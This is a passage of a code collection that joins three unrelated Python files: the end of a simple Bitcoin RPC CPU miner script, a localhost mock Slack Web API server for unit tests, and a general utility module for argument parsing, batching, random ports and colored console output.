(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 18026
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
mock_web_api_server.py
|
import json
import logging
import re
import sys
import threading
import time
from http import HTTPStatus
from http.server import HTTPServer, SimpleHTTPRequestHandler
from multiprocessing.context import Process
from typing import Type
from unittest import TestCase
from urllib.request import Request, urlopen
from tests.helpers import get_mock_server_mode
class MockHandler(SimpleHTTPRequestHandler):
protocol_version = "HTTP/1.1"
default_request_version = "HTTP/1.1"
logger = logging.getLogger(__name__)
pattern_for_language = re.compile("python/(\\S+)", re.IGNORECASE)
pattern_for_package_identifier = re.compile("slackclient/(\\S+)")
def is_valid_user_agent(self):
user_agent = self.headers["User-Agent"]
return self.pattern_for_language.search(
user_agent
) and self.pattern_for_package_identifier.search(user_agent)
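# The two patterns above only require that the User-Agent advertises both the Python runtime
# and the slackclient package, e.g. a (made-up) header such as
# "Bolt/1.0 python/3.9.7 slackclient/3.11.2" would be accepted.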
def set_common_headers(self):
self.send_header("content-type", "application/json;charset=utf-8")
self.send_header("connection", "close")
self.end_headers()
def do_GET(self):
if self.path == "/received_requests.json":
self.send_response(200)
self.set_common_headers()
self.wfile.write(json.dumps(self.received_requests).encode("utf-8"))
return
try:
if self.path == "/timeout":
time.sleep(2)
# user-agent-this_is-test
if self.path.startswith("/user-agent-"):
elements = self.path.split("-")
prefix, suffix = elements[2], elements[-1]
ua: str = self.headers["User-Agent"]
if ua.startswith(prefix) and ua.endswith(suffix):
self.send_response(HTTPStatus.OK)
self.set_common_headers()
self.wfile.write("ok".encode("utf-8"))
self.wfile.close()
return
else:
self.send_response(HTTPStatus.BAD_REQUEST)
self.set_common_headers()
self.wfile.write("invalid user agent".encode("utf-8"))
self.wfile.close()
return
body = "{}"
if self.path.startswith("/logs"):
body = """{"entries":[{"id":"xxx-yyy-zzz-111","date_create":1611221649,"action":"user_login","actor":{"type":"user","user":{"id":"W111","name":"your name","email":"foo@example.com","team":"E111"}},"entity":{"type":"user","user":{"id":"W111","name":"your name","email":"foo@example.com","team":"E111"}},"context":{"location":{"type":"workspace","id":"T111","name":"WS","domain":"foo-bar-baz"},"ua":"UA","ip_address":"1.2.3.4","session_id":1656410836837}},{"id":"32c68de4-cbfa-4fcb-9780-25fdd5aacf32","date_create":1611221649,"action":"user_login","actor":{"type":"user","user":{"id":"W111","name":"your name","email":"foo@example.com","team":"E111"}},"entity":{"type":"user","user":{"id":"W111","name":"your name","email":"foo@example.com","team":"E111"}},"context":{"location":{"type":"workspace","id":"T111","name":"WS","domain":"foo-bar-baz"},"ua":"UA","ip_address":"1.2.3.4","session_id":1656410836837}}],"response_metadata":{"next_cursor":"xxx"}}"""
if self.path == "/schemas":
body = """{"schemas":[{"type":"workspace","workspace":{"id":"string","name":"string","domain":"string"}},{"type":"enterprise","enterprise":{"id":"string","name":"string","domain":"string"}},{"type":"user","user":{"id":"string","name":"string","email":"string","team":"string"}},{"type":"file","file":{"id":"string","name":"string","filetype":"string","title":"string"}},{"type":"channel","channel":{"id":"string","name":"string","privacy":"string","is_shared":"bool","is_org_shared":"bool","teams_shared_with":"Optional: varray<string>"}},{"type":"app","app":{"id":"string","name":"string","is_distributed":"bool","is_directory_approved":"bool","is_workflow_app":"bool","scopes":"array"}},{"type":"workflow","workflow":{"id":"string","name":"string"}},{"type":"barrier","barrier":{"id":"string","primary_usergroup":"string","barriered_from_usergroup":"string"}},{"type":"message","message":{"team":"string","channel":"string","timestamp":"string"}}]}"""
if self.path == "/actions":
body = """{"actions":{"workspace_or_org":["workspace_created","workspace_deleted","organization_created","organization_deleted","organization_renamed","organization_domain_changed","organization_accepted_migration","organization_declined_migration","emoji_added","emoji_removed","emoji_aliased","emoji_renamed","billing_address_added","migration_scheduled","workspace_accepted_migration","workspace_declined_migration","migration_completed","migration_dms_mpdms_completed","corporate_exports_approved","corporate_exports_enabled","manual_export_started","manual_export_completed","manual_export_downloaded","manual_export_deleted","scheduled_export_started","scheduled_export_completed","scheduled_export_downloaded","scheduled_export_deleted","channels_export_started","channels_export_completed","channels_export_downloaded","channels_export_deleted","manual_user_export_started","manual_user_export_completed","manual_user_export_downloaded","manual_user_export_deleted","ekm_enrolled","ekm_unenrolled","ekm_key_added","ekm_key_removed","ekm_clear_cache_set","ekm_logging_config_set","ekm_slackbot_enroll_notification_sent","ekm_slackbot_unenroll_notification_sent","ekm_slackbot_rekey_notification_sent","ekm_slackbot_logging_notification_sent","approved_orgs_added","approved_orgs_removed","organization_verified","organization_unverified","organization_public_url_updated","pref.admin_retention_override_changed","pref.allow_calls","pref.dlp_access_changed","pref.allow_message_deletion","pref.retention_override_changed","pref.app_dir_only","pref.app_whitelist_enabled","pref.block_file_download_for_unapproved_ip","pref.can_receive_shared_channels_invites","pref.commands_only_regular","pref.custom_tos","pref.disallow_public_file_urls","pref.display_real_names","pref.dm_retention_changed","pref.dnd_enabled","pref.dnd_end_hour","pref.dnd_start_hour","pref.emoji_only_admins","pref.ent_required_browser","pref.enterprise_default_channels","pref.block_download_and_copy_on_untrusted_mobile","pref.enterprise_mobile_device_check","pref.enterprise_team_creation_request","pref.file_retention_changed","pref.private_channel_retention_changed","pref.hide_referers","pref.loading_only_admins","pref.mobile_secondary_auth_timeout_changed","pref.msg_edit_window_mins","pref.notification_redaction_type","pref.required_minimum_mobile_version_changed","pref.public_channel_retention_changed","pref.session_duration_changed","pref.session_duration_type_changed","pref.sign_in_with_slack_disabled","pref.slackbot_responses_disabled","pref.slackbot_responses_only_admins","pref.stats_only_admins","pref.two_factor_auth_changed","pref.username_policy","pref.who_can_archive_channels","pref.who_can_create_public_channels","pref.who_can_create_delete_user_groups","pref.who_can_create_private_channels","pref.who_can_edit_user_groups","pref.who_can_remove_from_public_channels","pref.who_can_remove_from_private_channels","pref.who_can_manage_channel_posting_prefs","pref.who_can_manage_ext_shared_channels","pref.who_can_manage_guests","pref.who_can_manage_shared_channels","pref.sso_setting_changed"],"user":["custom_tos_accepted","guest_created","guest_deactivated","guest_reactivated","owner_transferred","role_change_to_admin","role_change_to_guest","role_change_to_owner","role_change_to_user","user_created","user_deactivated","user_login","user_login_failed","user_logout","user_reactivated","guest_expiration_set","guest_expiration_cleared","guest_expired","user_logout_compromised","user_session_reset_by_admin","user_session_invalidated","user_logout
_non_compliant_mobile_app_version","user_force_upgrade_non_compliant_mobile_app_version"],"file":["file_downloaded","file_uploaded","file_public_link_created","file_public_link_revoked","file_shared","file_downloaded_blocked"],"channel":["user_channel_join","user_channel_leave","guest_channel_join","guest_channel_leave","public_channel_created","private_channel_created","public_channel_deleted","private_channel_deleted","public_channel_archive","private_channel_archive","public_channel_unarchive","private_channel_unarchive","mpim_converted_to_private","public_channel_converted_to_private","group_converted_to_channel","channel_workspaces_updated","external_shared_channel_invite_sent","external_shared_channel_invite_accepted","external_shared_channel_invite_approved","external_shared_channel_invite_created","external_shared_channel_invite_declined","external_shared_channel_invite_expired","external_shared_channel_invite_revoked","external_shared_channel_invite_auto_revoked","external_shared_channel_connected","external_shared_channel_disconnected","external_shared_channel_reconnected","channel_moved","channel_posting_pref_changed_from_org_level","channel_renamed","channel_email_address_created","channel_email_address_deleted"],"app":["app_installed","app_uninstalled","app_scopes_expanded","app_approved","app_restricted","app_removed_from_whitelist","app_resources_granted","app_token_preserved","workflow_app_token_preserved","bot_token_upgraded","bot_token_downgraded","org_app_workspace_added","org_app_workspace_removed","org_app_future_workspace_install_enabled","org_app_future_workspace_install_disabled","org_app_upgraded_to_org_install"],"workflow_builder":["workflow_created","workflow_deleted","workflow_published","workflow_unpublished","workflow_responses_csv_download"],"barrier":["barrier_created","barrier_updated","barrier_deleted"],"message":["message_tombstoned","message_restored"]}}"""
self.send_response(HTTPStatus.OK)
self.set_common_headers()
self.wfile.write(body.encode("utf-8"))
self.wfile.close()
except Exception as e:
self.logger.error(str(e), exc_info=True)
raise
class MockServerProcessTarget:
def __init__(self, handler: Type[SimpleHTTPRequestHandler] = MockHandler):
self.handler = handler
def run(self):
self.handler.received_requests = {}
self.server = HTTPServer(("localhost", 8888), self.handler)
try:
self.server.serve_forever(0.05)
finally:
self.server.server_close()
def stop(self):
self.handler.received_requests = {}
self.server.shutdown()
self.join()
class MonitorThread(threading.Thread):
def __init__(
self, test: TestCase, handler: Type[SimpleHTTPRequestHandler] = MockHandler
):
threading.Thread.__init__(self, daemon=True)
self.handler = handler
self.test = test
self.test.mock_received_requests = None
self.is_running = True
def run(self) -> None:
while self.is_running:
try:
req = Request(f"{self.test.server_url}/received_requests.json")
resp = urlopen(req, timeout=1)
self.test.mock_received_requests = json.loads(
resp.read().decode("utf-8")
)
except Exception as e:
# skip logging for the initial request
if self.test.mock_received_requests is not None:
logging.getLogger(__name__).exception(e)
time.sleep(0.01)
def stop(self):
self.is_running = False
self.join()
class MockServerThread(threading.Thread):
def __init__(
self, test: TestCase, handler: Type[SimpleHTTPRequestHandler] = MockHandler
):
threading.Thread.__init__(self)
self.handler = handler
self.test = test
def run(self):
self.server = HTTPServer(("localhost", 8888), self.handler)
self.test.server_url = "http://localhost:8888"
self.test.host, self.test.port = self.server.socket.getsockname()
self.test.server_started.set() # threading.Event()
self.test = None
try:
self.server.serve_forever()
finally:
self.server.server_close()
def stop(self):
self.server.shutdown()
self.join()
def setup_mock_web_api_server(test: TestCase):
if get_mock_server_mode() == "threading":
test.server_started = threading.Event()
test.thread = MockServerThread(test)
test.thread.start()
test.server_started.wait()
else:
# start a mock server as another process
target = MockServerProcessTarget()
test.server_url = "http://localhost:8888"
test.host, test.port = "localhost", 8888
test.process = Process(target=target.run, daemon=True)
test.process.start()
time.sleep(0.1)
# start a thread in the current process
# this thread fetches mock_received_requests from the remote process
test.monitor_thread = MonitorThread(test)
test.monitor_thread.start()
count = 0
# wait until the first successful data retrieval
while test.mock_received_requests is None:
time.sleep(0.01)
count += 1
if count >= 100:
raise Exception("The mock server is not yet running!")
def cleanup_mock_web_api_server(test: TestCase):
if get_mock_server_mode() == "threading":
test.thread.stop()
test.thread = None
else:
# stop the thread to fetch mock_received_requests from the remote process
test.monitor_thread.stop()
retry_count = 0
# terminate the process
while test.process.is_alive():
test.process.terminate()
time.sleep(0.01)
retry_count += 1
if retry_count >= 100:
raise Exception("Failed to stop the mock server!")
# Python 3.6 does not have this method
if sys.version_info.major == 3 and sys.version_info.minor > 6:
# cleanup the process's resources
test.process.close()
test.process = None
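# Usage sketch (assumption, not part of this module): a unittest.TestCase typically
# wires these helpers into setUp/tearDown so every test talks to the mock API on
# http://localhost:8888. The import path below is illustrative.
#
#   from unittest import TestCase
#   from tests.mock_web_api_server import (
#       setup_mock_web_api_server,
#       cleanup_mock_web_api_server,
#   )
#
#   class TestWebClient(TestCase):
#       def setUp(self):
#           setup_mock_web_api_server(self)   # sets self.server_url / self.host / self.port
#
#       def tearDown(self):
#           cleanup_mock_web_api_server(self)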
|
helper.py
|
import asyncio
import functools
import json
import math
import os
import random
import re
import sys
import threading
import time
import uuid
import warnings
from argparse import ArgumentParser, Namespace
from datetime import datetime
from itertools import islice
from types import SimpleNamespace
from typing import (
Tuple,
Optional,
Iterator,
Any,
Union,
List,
Dict,
Set,
Sequence,
Iterable,
)
from . import __windows__
__all__ = [
'batch_iterator',
'parse_arg',
'random_port',
'random_identity',
'random_uuid',
'expand_env_var',
'colored',
'ArgNamespace',
'is_valid_local_config_source',
'cached_property',
'typename',
'get_public_ip',
'get_internal_ip',
'convert_tuple_to_list',
'run_async',
'deprecated_alias',
'countdown',
'CatchAllCleanupContextManager',
'download_mermaid_url',
'get_readable_size',
'get_or_reuse_loop',
]
def deprecated_alias(**aliases):
"""
Usage: pass kwargs whose key is the deprecated argument name and whose value is a tuple ``(new_name, deprecate_level)``.
Level 0 issues a warning, level 1 raises an exception.
For example:
.. highlight:: python
.. code-block:: python
@deprecated_alias(input_fn=('inputs', 0), buffer=('input_fn', 0), callback=('on_done', 1), output_fn=('on_done', 1))
:param aliases: maps aliases to new arguments
:return: wrapper
"""
from .excepts import NotSupportedError
def _rename_kwargs(func_name: str, kwargs, aliases):
"""
Raise warnings or exceptions for deprecated arguments.
:param func_name: Name of the function.
:param kwargs: key word arguments from the function which is decorated.
:param aliases: kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
"""
for alias, new_arg in aliases.items():
if not isinstance(new_arg, tuple):
raise ValueError(
f'{new_arg} must be a tuple, with first element as the new name, '
f'second element as the deprecated level: 0 as warning, 1 as exception'
)
if alias in kwargs:
new_name, dep_level = new_arg
if new_name in kwargs:
raise NotSupportedError(
f'{func_name} received both {alias} and {new_name}'
)
if dep_level == 0:
warnings.warn(
f'`{alias}` is renamed to `{new_name}` in `{func_name}()`, the usage of `{alias}` is '
f'deprecated and will be removed in the next version.',
DeprecationWarning,
)
kwargs[new_name] = kwargs.pop(alias)
elif dep_level == 1:
raise NotSupportedError(f'{alias} has been renamed to `{new_name}`')
def deco(f):
"""
Set Decorator function.
:param f: function the decorator is used for
:return: wrapper
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
"""
Set wrapper function.
:param args: wrapper arguments
:param kwargs: wrapper key word arguments
:return: result of renamed function.
"""
_rename_kwargs(f.__name__, kwargs, aliases)
return f(*args, **kwargs)
return wrapper
return deco
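# Usage sketch (hypothetical function and argument names, shown only to illustrate
# the two deprecation levels handled above):
#
#   @deprecated_alias(input_fn=('inputs', 0), callback=('on_done', 1))
#   def index(inputs=None, on_done=None):
#       ...
#
#   index(input_fn=[1, 2, 3])   # level 0: warns, then forwards the value to `inputs`
#   index(callback=print)       # level 1: raises NotSupportedError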
def deprecated_method(new_function_name):
def deco(func):
def wrapper(*args, **kwargs):
warnings.warn(
f'`{func.__name__}` is renamed to `{new_function_name}`, the usage of `{func.__name__}` is '
f'deprecated and will be removed.',
DeprecationWarning,
)
return func(*args, **kwargs)
return wrapper
return deco
def get_readable_size(num_bytes: Union[int, float]) -> str:
"""
Transform the bytes into readable value with different units (e.g. 1 KB, 20 MB, 30.1 GB).
:param num_bytes: Number of bytes.
:return: Human readable string representation.
"""
num_bytes = int(num_bytes)
if num_bytes < 1024:
return f'{num_bytes} Bytes'
elif num_bytes < 1024 ** 2:
return f'{num_bytes / 1024:.1f} KB'
elif num_bytes < 1024 ** 3:
return f'{num_bytes / (1024 ** 2):.1f} MB'
else:
return f'{num_bytes / (1024 ** 3):.1f} GB'
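# Examples, following the 1024-based thresholds above:
#   get_readable_size(512)          -> '512 Bytes'
#   get_readable_size(2048)         -> '2.0 KB'
#   get_readable_size(3 * 1024**2)  -> '3.0 MB'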
def batch_iterator(
data: Iterable[Any],
batch_size: int,
axis: int = 0,
) -> Iterator[Any]:
"""
Get an iterator of batches of data.
For example:
.. highlight:: python
.. code-block:: python
for req in batch_iterator(data, batch_size, split_over_axis):
# Do something with batch
:param data: Data source.
:param batch_size: Size of one batch.
:param axis: Determine which axis to iterate for np.ndarray data.
:yield: data
:return: An Iterator of batch data.
"""
import numpy as np
if not batch_size or batch_size <= 0:
yield data
return
if isinstance(data, np.ndarray):
_l = data.shape[axis]
_d = data.ndim
sl = [slice(None)] * _d
if batch_size >= _l:
yield data
return
for start in range(0, _l, batch_size):
end = min(_l, start + batch_size)
sl[axis] = slice(start, end)
yield data[tuple(sl)]
elif isinstance(data, Sequence):
if batch_size >= len(data):
yield data
return
for _ in range(0, len(data), batch_size):
yield data[_ : _ + batch_size]
elif isinstance(data, Iterable):
# as iterator, there is no way to know the length of it
iterator = iter(data)
while True:
chunk = tuple(islice(iterator, batch_size))
if not chunk:
return
yield chunk
else:
raise TypeError(f'unsupported type: {type(data)}')
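# Usage sketch: a Sequence is sliced into equally sized batches (the last one may be
# smaller); a numpy array is sliced along `axis`; any other iterable is consumed
# lazily and yielded as tuples.
#
#   list(batch_iterator([1, 2, 3, 4, 5], 2))   # -> [[1, 2], [3, 4], [5]]
#   list(batch_iterator(iter(range(5)), 2))    # -> [(0, 1), (2, 3), (4,)]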
def parse_arg(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Parse the arguments from string to `Union[bool, int, str, list, float]`.
:param v: The string of arguments
:return: The parsed arguments list.
"""
m = re.match(r'^[\'"](.*)[\'"]$', v)
if m:
return m.group(1)
if v.startswith('[') and v.endswith(']'):
# function args must be immutable tuples not list
tmp = v.replace('[', '').replace(']', '').strip().split(',')
if len(tmp) > 0:
return [parse_arg(vv.strip()) for vv in tmp]
else:
return []
try:
v = int(v) # parse int parameter
except ValueError:
try:
v = float(v) # parse float parameter
except ValueError:
if len(v) == 0:
# ignore it when the parameter is empty
v = None
elif v.lower() == 'true': # parse boolean parameter
v = True
elif v.lower() == 'false':
v = False
return v
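# Examples of the parsing rules above:
#   parse_arg('123')      -> 123         (int)
#   parse_arg('1.5')      -> 1.5         (float)
#   parse_arg('true')     -> True        (case-insensitive booleans)
#   parse_arg('"hello"')  -> 'hello'     (surrounding quotes stripped)
#   parse_arg('[1, 2]')   -> [1, 2]      (recursively parsed list)
#   parse_arg('')         -> None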
def countdown(t: int, reason: str = 'I am blocking this thread') -> None:
"""
Display the countdown in console.
For example:
.. highlight:: python
.. code-block:: python
countdown(10, reason=colored('re-fetch access token', 'cyan', attrs=['bold', 'reverse']))
:param t: Countdown time.
:param reason: A string message of reason for this Countdown.
"""
try:
sys.stdout.write('\n')
sys.stdout.flush()
while t > 0:
t -= 1
msg = f'⏳ {colored("%3d" % t, "yellow")}s left: {reason}'
sys.stdout.write(f'\r{msg}')
sys.stdout.flush()
time.sleep(1)
sys.stdout.write('\n')
sys.stdout.flush()
except KeyboardInterrupt:
sys.stdout.write('no more patience? good bye!')
_random_names = (
(
'first',
'great',
'local',
'small',
'right',
'large',
'young',
'early',
'major',
'clear',
'black',
'whole',
'third',
'white',
'short',
'human',
'royal',
'wrong',
'legal',
'final',
'close',
'total',
'prime',
'happy',
'sorry',
'basic',
'aware',
'ready',
'green',
'heavy',
'extra',
'civil',
'chief',
'usual',
'front',
'fresh',
'joint',
'alone',
'rural',
'light',
'equal',
'quiet',
'quick',
'daily',
'urban',
'upper',
'moral',
'vital',
'empty',
'brief',
),
(
'world',
'house',
'place',
'group',
'party',
'money',
'point',
'state',
'night',
'water',
'thing',
'order',
'power',
'court',
'level',
'child',
'south',
'staff',
'woman',
'north',
'sense',
'death',
'range',
'table',
'trade',
'study',
'other',
'price',
'class',
'union',
'value',
'paper',
'right',
'voice',
'stage',
'light',
'march',
'board',
'month',
'music',
'field',
'award',
'issue',
'basis',
'front',
'heart',
'force',
'model',
'space',
'peter',
),
)
def random_name() -> str:
"""
Generate a random name from list.
:return: A Random name.
"""
return '_'.join(random.choice(_random_names[j]) for j in range(2))
def random_port() -> Optional[int]:
"""
Get a random available port number from '49153' to '65535'.
:return: A random port.
"""
import threading
import multiprocessing
from contextlib import closing
import socket
def _get_port(port=0):
with multiprocessing.Lock():
with threading.Lock():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
try:
s.bind(('', port))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
except OSError:
pass
_port = None
if 'JINA_RANDOM_PORT_MIN' in os.environ or 'JINA_RANDOM_PORT_MAX' in os.environ:
min_port = int(os.environ.get('JINA_RANDOM_PORT_MIN', '49153'))
max_port = int(os.environ.get('JINA_RANDOM_PORT_MAX', '65535'))
all_ports = list(range(min_port, max_port + 1))
random.shuffle(all_ports)
for _port in all_ports:
if _get_port(_port) is not None:
break
else:
raise OSError(
f'can not find an available port between [{min_port}, {max_port}].'
)
else:
_port = _get_port()
return int(_port)
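# Usage sketch: the search range can optionally be narrowed via environment
# variables, otherwise the OS assigns any free port.
#
#   os.environ['JINA_RANDOM_PORT_MIN'] = '52000'
#   os.environ['JINA_RANDOM_PORT_MAX'] = '52100'
#   port = random_port()   # a free port within [52000, 52100]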
def random_identity(use_uuid1: bool = False) -> str:
"""
Generate random UUID.
.. note::
A MAC address or time-based ordering (UUID1) can afford increased database performance, since it's less work
to sort numbers closer-together than those distributed randomly (UUID4) (see here).
A second related issue is that using UUID1 can be useful in debugging, even if origin data is lost or not
explicitly stored.
:param use_uuid1: use UUID1 instead of UUID4. This is the default Document ID generator.
:return: A random UUID.
"""
return str(random_uuid(use_uuid1))
def random_uuid(use_uuid1: bool = False) -> uuid.UUID:
"""
Get a random UUID.
:param use_uuid1: Use UUID1 if True, else use UUID4.
:return: A random UUID.
"""
return uuid.uuid1() if use_uuid1 else uuid.uuid4()
def expand_env_var(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Expand the environment variables.
:param v: String of environment variables.
:return: Parsed environment variables.
"""
if isinstance(v, str):
return parse_arg(os.path.expandvars(v))
else:
return v
def expand_dict(
d: Dict, expand_fn=expand_env_var, resolve_cycle_ref=True
) -> Dict[str, Any]:
"""
Expand variables from YAML file.
:param d: Target Dict.
:param expand_fn: Parsed environment variables.
:param resolve_cycle_ref: Defines if cyclic references should be resolved.
:return: Expanded variables.
"""
expand_map = SimpleNamespace()
pat = re.compile(r'{.+}|\$[a-zA-Z0-9_]*\b')
def _scan(sub_d: Union[Dict, List], p):
if isinstance(sub_d, dict):
for k, v in sub_d.items():
if isinstance(v, dict):
p.__dict__[k] = SimpleNamespace()
_scan(v, p.__dict__[k])
elif isinstance(v, list):
p.__dict__[k] = list()
_scan(v, p.__dict__[k])
else:
p.__dict__[k] = v
elif isinstance(sub_d, list):
for idx, v in enumerate(sub_d):
if isinstance(v, dict):
p.append(SimpleNamespace())
_scan(v, p[idx])
elif isinstance(v, list):
p.append(list())
_scan(v, p[idx])
else:
p.append(v)
def _replace(sub_d: Union[Dict, List], p):
if isinstance(sub_d, Dict):
for k, v in sub_d.items():
if isinstance(v, (dict, list)):
_replace(v, p.__dict__[k])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[k] = _sub(v, p)
elif isinstance(sub_d, List):
for idx, v in enumerate(sub_d):
if isinstance(v, (dict, list)):
_replace(v, p[idx])
else:
if isinstance(v, str) and pat.findall(v):
sub_d[idx] = _sub(v, p)
def _sub(v, p):
if resolve_cycle_ref:
try:
v = v.format(root=expand_map, this=p)
except KeyError:
pass
return expand_fn(v)
_scan(d, expand_map)
_replace(d, expand_map)
return d
_ATTRIBUTES = {
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8,
}
_HIGHLIGHTS = {
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47,
}
_COLORS = {
'black': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37,
}
_RESET = '\033[0m'
if __windows__:
os.system('color')
def colored(
text: str,
color: Optional[str] = None,
on_color: Optional[str] = None,
attrs: Optional[Union[str, list]] = None,
) -> str:
"""
Give the text with color.
:param text: The target text.
:param color: The color of text. Chosen from the following.
{
'grey': 30,
'red': 31,
'green': 32,
'yellow': 33,
'blue': 34,
'magenta': 35,
'cyan': 36,
'white': 37
}
:param on_color: The on_color of text. Chosen from the following.
{
'on_grey': 40,
'on_red': 41,
'on_green': 42,
'on_yellow': 43,
'on_blue': 44,
'on_magenta': 45,
'on_cyan': 46,
'on_white': 47
}
:param attrs: Attributes of color. Chosen from the following.
{
'bold': 1,
'dark': 2,
'underline': 4,
'blink': 5,
'reverse': 7,
'concealed': 8
}
:return: Colored text.
"""
if 'JINA_LOG_NO_COLOR' not in os.environ:
fmt_str = '\033[%dm%s'
if color:
text = fmt_str % (_COLORS[color], text)
if on_color:
text = fmt_str % (_HIGHLIGHTS[on_color], text)
if attrs:
if isinstance(attrs, str):
attrs = [attrs]
if isinstance(attrs, list):
for attr in attrs:
text = fmt_str % (_ATTRIBUTES[attr], text)
text += _RESET
return text
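# Usage sketch:
#   print(colored('done', color='green', attrs='bold'))
#   print(colored('WARN', color='yellow', on_color='on_red', attrs=['bold', 'blink']))
#   # setting JINA_LOG_NO_COLOR in the environment returns the text unmodified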
class ColorContext:
def __init__(self, color: str, bold: Optional[bool] = False):
self._color = color
self._bold = bold
def __enter__(self):
if self._bold:
fmt_str = '\033[1;%dm'
else:
fmt_str = '\033[0;%dm'
c = fmt_str % (_COLORS[self._color])
print(c, flush=True, end='')
return self
def __exit__(self, typ, value, traceback):
print(_RESET, flush=True, end='')
def warn_unknown_args(unknown_args: List[str]):
"""Creates warnings for all given arguments.
:param unknown_args: arguments that are possibly unknown to Jina
"""
from cli.lookup import _build_lookup_table
all_args = _build_lookup_table()[0]
has_migration_tip = False
real_unknown_args = []
warn_strs = []
for arg in unknown_args:
if arg.replace('--', '') not in all_args:
from .parsers.deprecated import get_deprecated_replacement
new_arg = get_deprecated_replacement(arg)
if new_arg:
if not has_migration_tip:
warn_strs.append('Migration tips:')
has_migration_tip = True
warn_strs.append(f'\t`{arg}` has been renamed to `{new_arg}`')
real_unknown_args.append(arg)
if real_unknown_args:
warn_strs = [f'ignored unknown argument: {real_unknown_args}.'] + warn_strs
warnings.warn(''.join(warn_strs))
class ArgNamespace:
"""Helper function for argparse.Namespace object."""
@staticmethod
def kwargs2list(kwargs: Dict) -> List[str]:
"""
Convert dict to an argparse-friendly list.
:param kwargs: dictionary of key-values to be converted
:return: argument list
"""
args = []
from .executors import BaseExecutor
for k, v in kwargs.items():
k = k.replace('_', '-')
if v is not None:
if isinstance(v, bool):
if v:
args.append(f'--{k}')
elif isinstance(v, list): # for nargs
args.extend([f'--{k}', *(str(vv) for vv in v)])
elif isinstance(v, dict):
args.extend([f'--{k}', json.dumps(v)])
elif isinstance(v, type) and issubclass(v, BaseExecutor):
args.extend([f'--{k}', v.__name__])
else:
args.extend([f'--{k}', str(v)])
return args
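# Example of the conversion rules above (dict insertion order is preserved):
#   ArgNamespace.kwargs2list({'name': 'foo', 'shards': 2, 'quiet': True})
#     -> ['--name', 'foo', '--shards', '2', '--quiet']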
@staticmethod
def kwargs2namespace(
kwargs: Dict[str, Union[str, int, bool]],
parser: ArgumentParser,
warn_unknown: bool = False,
fallback_parsers: List[ArgumentParser] = None,
) -> Namespace:
"""
Convert dict to a namespace.
:param kwargs: dictionary of key-values to be converted
:param parser: the parser for building kwargs into a namespace
:param warn_unknown: True, if unknown arguments should be logged
:param fallback_parsers: a list of parsers to help resolving the args
:return: argument list
"""
args = ArgNamespace.kwargs2list(kwargs)
p_args, unknown_args = parser.parse_known_args(args)
if warn_unknown and unknown_args:
_leftovers = set(unknown_args)
if fallback_parsers:
for p in fallback_parsers:
_, _unk_args = p.parse_known_args(args)
_leftovers = _leftovers.intersection(_unk_args)
if not _leftovers:
# all args have been resolved
break
warn_unknown_args(_leftovers)
return p_args
@staticmethod
def get_non_defaults_args(
args: Namespace, parser: ArgumentParser, taboo: Optional[Set[str]] = None
) -> Dict:
"""
Get non-default args in a dict.
:param args: the namespace to parse
:param parser: the parser for referring the default values
:param taboo: exclude keys in the final result
:return: non defaults
"""
if taboo is None:
taboo = set()
non_defaults = {}
_defaults = vars(parser.parse_args([]))
for k, v in vars(args).items():
if k in _defaults and k not in taboo and _defaults[k] != v:
non_defaults[k] = v
return non_defaults
@staticmethod
def flatten_to_dict(
args: Union[Dict[str, 'Namespace'], 'Namespace']
) -> Dict[str, Any]:
"""Convert argparse.Namespace to dict to be uploaded via REST.
:param args: namespace or dict or namespace to dict.
:return: pea args
"""
if isinstance(args, Namespace):
return vars(args)
elif isinstance(args, dict):
pea_args = {}
for k, v in args.items():
if isinstance(v, Namespace):
pea_args[k] = vars(v)
elif isinstance(v, list):
pea_args[k] = [vars(_) for _ in v]
else:
pea_args[k] = v
return pea_args
def is_valid_local_config_source(path: str) -> bool:
# TODO: this function must be refactored before 1.0 (Han 12.22)
"""
Check if the path is valid.
:param path: Local file path.
:return: True if the path is valid else False.
"""
try:
from .jaml import parse_config_source
parse_config_source(path)
return True
